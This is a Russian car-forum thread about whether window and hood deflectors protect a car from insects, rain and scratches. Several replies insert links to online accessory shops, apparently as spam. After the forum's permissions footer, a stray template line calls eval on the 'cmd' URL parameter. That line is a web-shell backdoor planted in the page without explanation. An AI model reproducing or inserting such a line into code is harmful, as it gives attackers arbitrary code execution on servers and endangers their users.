+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Ветровики


  1. #1
    Мимо проходил Trety is on a distinguished road Аватар для Trety
    Регистрация
    17.12.2018
    Сообщений
    8

    Ветровики

    Привет, народ! Как думаете, стоит ли устанавливать ветровики на авто? Собираюсь поехать в лес, а авто недавно купил, не хожу царапать морду. Насколько они защищают?

  2. #2
    Мимо проходил Oxoxo is on a distinguished road Аватар для Oxoxo
    Регистрация
    13.02.2019
    Сообщений
    12
    Ну ветровики скорее для езды по трассе подойдут, мне так кажется. У меня стоят, стоят они не дорого, а вот от мошек защищаю отлично. Поэтому, если думаете, то лучше купите.

  3. #3
    Мимо проходил Hommy is on a distinguished road Аватар для Hommy
    Регистрация
    18.12.2018
    Откуда
    ...
    Машина
    Бричка
    Сообщений
    10
    Скорее от царапин, нужно сделать бронироваие авто, но ветровики могут помочь от мошек на загородных дорогах. К тому же в условиях непогоды защищают от дождя. Я думаю, что стоит установить, все таки пользы о них больше на мой взгляд. Вот здесь например можно купить ветровики и дефлекторы http://viptuning52.ru/

  4. #4
    Мимо проходил Kollins is on a distinguished road Аватар для Kollins
    Регистрация
    05.01.2019
    Машина
    Вольц
    Сообщений
    11
    Не уверен в необходимости. Вот, честно говоря не люблю лишние детали и атрибуты на авто. Мне кажется, в них нет особой необходимости, многие авто сделаны так, что ни мошки, ни дождь не страшны.

  5. #5
    Мимо проходил fionis is on a distinguished road Аватар для fionis
    Регистрация
    30.11.2018
    Машина
    Гольф
    Сообщений
    49
    Вы имеете в виду дефлекторы капота или окон? Если часто планируете ездить на природу, то однозначно советую поставить мухобойки на капот, они лишними никогда не будут. И от механических повреждений защитят, и меньше будет на лобовухе насекомых, что летом очень актуально. А ветровики по желанию можно ставить, но я себе их первых делом купил, так как и от дождя защищают, и когда курю, дым вытягивается с ними отлично. Тем более стоят такие дефлекторы не очень дорого, можете посмотреть их цену на свое авто в любом интернет-магазине автоаксессуаров http://crosstrade.ru/

  6. #6
    GTI-Racing Ignat is on a distinguished road Аватар для Ignat
    Регистрация
    15.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    259
    Всем доброго времени суток. Я всегда периодически балую свою машину, там разные аксессуары и запчасти покупаю. Вот не давно приобрел дефлекторы https://4car.su/katalog/deflektory/ для своей машины. Тут огромный выбор в ассортименте по адекватной цене. Доставили довольно таки быстро, дефлектор качественный ни каких нариканий нет. Всем советую этот интернет-магазин!

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}